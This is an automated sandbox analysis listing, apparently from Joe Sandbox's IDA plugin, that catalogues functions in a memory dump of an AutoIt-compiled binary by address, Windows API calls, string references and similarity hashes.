mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B8710F

Part of subcall function 00B75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B752BC

GetCursorPos.USER32(?), ref: 00B8713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B87199

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 630a42d060b62e4e838b3a44d187c68be209bca2bbb86c364db1773b44212684
Instruction ID: feb2d24d08cf1efeb0f1b5aedc01c69ecfdf9f671d37db5be2b9de8c28ae2130
Opcode Fuzzy Hash: 630a42d060b62e4e838b3a44d187c68be209bca2bbb86c364db1773b44212684
Instruction Fuzzy Hash: 7831E472509306ABD720EF14C849F9BB7E9FF88314F10091AF599E7191CB74EA09CB92

Function 00B68879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B680C0
Part of subcall function 00B680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B680CA
Part of subcall function 00B680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B680D9
Part of subcall function 00B680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B680E0
Part of subcall function 00B680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B680F6

GetLengthSid.ADVAPI32(?,00000000,00B6842F), ref: 00B688CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B688D6
HeapAlloc.KERNEL32(00000000), ref: 00B688DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00B688F6
GetProcessHeap.KERNEL32(00000000,00000000,00B6842F), ref: 00B6890A
HeapFree.KERNEL32(00000000), ref: 00B68911

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: cf046a629014e2d391ea583062e6d9b42b117c05fcd05866661f115e77186ef9
Instruction ID: a59ae864c6c8ab06abb313f34d3bab68ea7c90207e24a6f3119577f1c546a6ae
Opcode Fuzzy Hash: cf046a629014e2d391ea583062e6d9b42b117c05fcd05866661f115e77186ef9
Instruction Fuzzy Hash: 4211B131501209FFDF109FA4DD09BBE77A8EB45321F1042ADE985E7160CB3A9D10DB60

Function 00B685B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B685E2
OpenProcessToken.ADVAPI32(00000000), ref: 00B685E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B685F8
CloseHandle.KERNEL32(00000004), ref: 00B68603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B68632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00B68646

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 870378bee88901568c8f85a19864e6dbc96afe7ecbf9439903b9fbb0638946ea
Instruction ID: acf8d51ce9c18053b09402d25ea2fd4aad576a8b8f638bec35569ecf1c77e1ce
Opcode Fuzzy Hash: 870378bee88901568c8f85a19864e6dbc96afe7ecbf9439903b9fbb0638946ea
Instruction Fuzzy Hash: 1811597250120AABDF018FA4DD49BEE7BE9EF08354F044165FE05E2160CB7A8D60EB60

Function 00B6B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B6B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B6B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B6B7CD
ReleaseDC.USER32(00000000,00000000), ref: 00B6B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B6B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00B6B7FE

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 338fdf5e79ab8cbce400c140cb33b4a85b652f852dc005e920a1ff92aba5f87b
Instruction ID: 785834c5ef379c06c97d55e8209a8aa8ee78ec93feea51bb3cf4f080a8874ab6
Opcode Fuzzy Hash: 338fdf5e79ab8cbce400c140cb33b4a85b652f852dc005e920a1ff92aba5f87b
Instruction Fuzzy Hash: 51014875E40315BBEB105FA69D45E6EBFB8EB48761F104076FA04E7291DA709C10CFA1

Function 00B30162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B30193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00B3019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B301A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B301B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00B301B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B301C1

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d9fbbc8317a748fbe18eef61f064987fd6ef7b5e3e674c8621c190b913e8ee07
Instruction ID: 579846c7b6d75cc3a2af45b799d1601c47ecbe8a52c0834287ab264eeb577916
Opcode Fuzzy Hash: d9fbbc8317a748fbe18eef61f064987fd6ef7b5e3e674c8621c190b913e8ee07
Instruction Fuzzy Hash: C5016CB090175A7DE3008F5A8C85B52FFB8FF19354F00411BA15C87941C7F5A864CBE5

Function 00B753E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B753F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B7540F
GetWindowThreadProcessId.USER32(?,?), ref: 00B7541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B7542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B75437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B7543E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 65a5f4d9518ef0444b71414d488e9a3116afcb0f18eb7eeddaac501c10a7cdfa
Instruction ID: 241c3da52192718b4829d39674a961dcf77a2a520b233ebf70a6dbf12209bdf5
Opcode Fuzzy Hash: 65a5f4d9518ef0444b71414d488e9a3116afcb0f18eb7eeddaac501c10a7cdfa
Instruction Fuzzy Hash: 5EF01D32641659BBE7215BA29D0DEBF7A7CEBC6B21F00016AFA04D20619AA51A01C6B5

Function 00B77230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00B77243
EnterCriticalSection.KERNEL32(?,?,00B20EE4,?,?), ref: 00B77254
TerminateThread.KERNEL32(00000000,000001F6,?,00B20EE4,?,?), ref: 00B77261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B20EE4,?,?), ref: 00B7726E

Part of subcall function 00B76C35: CloseHandle.KERNEL32(00000000,?,00B7727B,?,00B20EE4,?,?), ref: 00B76C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00B77281
LeaveCriticalSection.KERNEL32(?,?,00B20EE4,?,?), ref: 00B77288

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 46bff60ea2e12a1eb9d47ce57daab01bd1c9a87cd0b9693532f9713e7f5e1b49
Instruction ID: 62b5049939ca9800b40aab686584de554d8f80fe8f801a54c3d34c0262b96c7a
Opcode Fuzzy Hash: 46bff60ea2e12a1eb9d47ce57daab01bd1c9a87cd0b9693532f9713e7f5e1b49
Instruction Fuzzy Hash: 5FF05E36544613EBDB121B64EE4CAEA7769EF45722B100573F603E20B1CF766811CB50

Function 00B68992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B6899D
UnloadUserProfile.USERENV(?,?), ref: 00B689A9
CloseHandle.KERNEL32(?), ref: 00B689B2
CloseHandle.KERNEL32(?), ref: 00B689BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00B689C3
HeapFree.KERNEL32(00000000), ref: 00B689CA

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: f9ac6ea47df8039ce0f348e628f5d627e9294f6ae5852c97fbe3e0626c16230d
Instruction ID: 03c2aacfcb70c6e7cec32e255679cdd8127d89a59fc648f5e407ed441d36cec5
Opcode Fuzzy Hash: f9ac6ea47df8039ce0f348e628f5d627e9294f6ae5852c97fbe3e0626c16230d
Instruction Fuzzy Hash: 80E0C936004002FBDA011FF1EE0C929BB69FB893327104232F219D2070CF365420DB94

Function 00B885ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B88613
CharUpperBuffW.USER32(?,?), ref: 00B88722
VariantClear.OLEAUT32(?), ref: 00B8889A

Part of subcall function 00B77562: VariantInit.OLEAUT32(00000000), ref: 00B775A2
Part of subcall function 00B77562: VariantCopy.OLEAUT32(00000000,?), ref: 00B775AB
Part of subcall function 00B77562: VariantClear.OLEAUT32(00000000), ref: 00B775B7

Strings

Incorrect Parameter format, xrefs: 00B8864B, 00B8880D
AUTOIT.ERROR, xrefs: 00B88728

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: ce1621b460ab81825c6eeb4dc59b2aa57ccf80c976f958cd403b7052db0ecd30
Instruction ID: 1782456d87d7b1f53301812ec418d023df79940b52d22f4b3b989a66afddb18a
Opcode Fuzzy Hash: ce1621b460ab81825c6eeb4dc59b2aa57ccf80c976f958cd403b7052db0ecd30
Instruction Fuzzy Hash: 01919D75604301DFCB10EF24C48496ABBF4EF89754F5489AEF89A8B361DB30E945CB92

Function 00B72A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FC86: _wcscpy.LIBCMT ref: 00B2FCA9

_memset.LIBCMT ref: 00B72B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B72BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B72C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B72C97

Strings

0, xrefs: 00B72B73

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 303660d33412e87f0ebe5008facd617c01a2d1c8b8d7a34ad5ca4518d8c07fcc
Instruction ID: 5306e448355a7ebb03cc6d2d1d633be9112682d57d422769d3acaccfe22bb783
Opcode Fuzzy Hash: 303660d33412e87f0ebe5008facd617c01a2d1c8b8d7a34ad5ca4518d8c07fcc
Instruction Fuzzy Hash: C051D0716083019AD726AF38D84566FB7E8EF68310F148AADF8A8D32D1DB70CD448752

Function 00B997F4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0170E0F8,?), ref: 00B99863
ScreenToClient.USER32(00000002,00000002), ref: 00B99896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00B99903

Strings

@U=u, xrefs: 00B9995E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: @U=u
API String ID: 3880355969-2594219639
Opcode ID: 23a97cfa74cbbafad01df1a869f7be880537f35085bb5e7bda7dec5bb1d9354a
Instruction ID: 63a6ada038eda2d2213a85c4045fe1e7629eced9a6f61c2cea16d8f9cefb79d5
Opcode Fuzzy Hash: 23a97cfa74cbbafad01df1a869f7be880537f35085bb5e7bda7dec5bb1d9354a
Instruction Fuzzy Hash: CD512D34A00209AFDF64CF68C980AAE7BF5FB45360F1481ADF8559B2A0D731AD41CB90

Function 00B69A80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B69AD2
__itow.LIBCMT ref: 00B69B03

Part of subcall function 00B69D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B69DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B69B6C
__itow.LIBCMT ref: 00B69BC3

Strings

@U=u, xrefs: 00B69AD2, 00B69B6C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$__itow
String ID: @U=u
API String ID: 3379773720-2594219639
Opcode ID: 7b904c248c9827964005c3f32f3f0d13e927509a41bb369bbd06e95e56858b2d
Instruction ID: 0f60365a744b74b7f473ec2290ee406aff4b30a6d37f423ea75d2fe6e95c1498
Opcode Fuzzy Hash: 7b904c248c9827964005c3f32f3f0d13e927509a41bb369bbd06e95e56858b2d
Instruction Fuzzy Hash: D1418170A00208ABDF21EF54D845FFE7BF9EF48750F4400A9F905A7291DB749A84CBA1

Function 00B697F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B69296,?,?,00000034,00000800,?,00000034), ref: 00B714E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B6983F

Part of subcall function 00B71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00B714B1

Part of subcall function 00B713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00B71409
Part of subcall function 00B713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B6925A,00000034,?,?,00001004,00000000,00000000), ref: 00B71419
Part of subcall function 00B713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B6925A,00000034,?,?,00001004,00000000,00000000), ref: 00B7142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B698AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B698F9

Strings

@, xrefs: 00B69911
@U=u, xrefs: 00B6983F, 00B698AC, 00B698F9

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @$@U=u
API String ID: 4150878124-826235744
Opcode ID: 4f2cacbd6cb28b24d9f8138f11f5b3b6a688ddde6c91c8e724030054724fc6f5
Instruction ID: 44b3b2827b781a34500d396702581647fce1f6acd20051d082d7db48273f6fbe
Opcode Fuzzy Hash: 4f2cacbd6cb28b24d9f8138f11f5b3b6a688ddde6c91c8e724030054724fc6f5
Instruction Fuzzy Hash: B541627690121CBFDB20DFA8CD41ADEBBB8EB49300F008599F959B7181DA706E45CFA0

Function 00B6D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B6D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B6D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B6D69D

Strings

DllGetClassObject, xrefs: 00B6D610

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 7c33339c736179a0759ef49050f33983c879e61b1952c3dabe037fc9d46248e2
Instruction ID: 5fefdb655ce9ed24ce8708b5f133265376d7a1475194e975ac49402a1b597ca5
Opcode Fuzzy Hash: 7c33339c736179a0759ef49050f33983c879e61b1952c3dabe037fc9d46248e2
Instruction Fuzzy Hash: 08414CB1B00205EFDB15DF64C884AAA7BE9EF44310F1581E9ED099F205DBB5DD44CBA0

Function 00B72753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B727C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B727DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00B72822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BD5890,00000000), ref: 00B7286B

Strings

0, xrefs: 00B727B5

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 3b69b3a8d932a9d9075eaa544b91c11689438d07249a9f278de7b52322d13420
Instruction ID: 17f1c4e372a37c91a0f10c1bc3525f0ee0e951fade97d8999e1bd3158ff6195d
Opcode Fuzzy Hash: 3b69b3a8d932a9d9075eaa544b91c11689438d07249a9f278de7b52322d13420
Instruction Fuzzy Hash: 0841A2702043419FD724DF25C845B6ABBE4EF85314F1485AEF4B997291DB31A905CB53

Function 00B98851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B988DE

Strings

@U=u, xrefs: 00B9892D

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

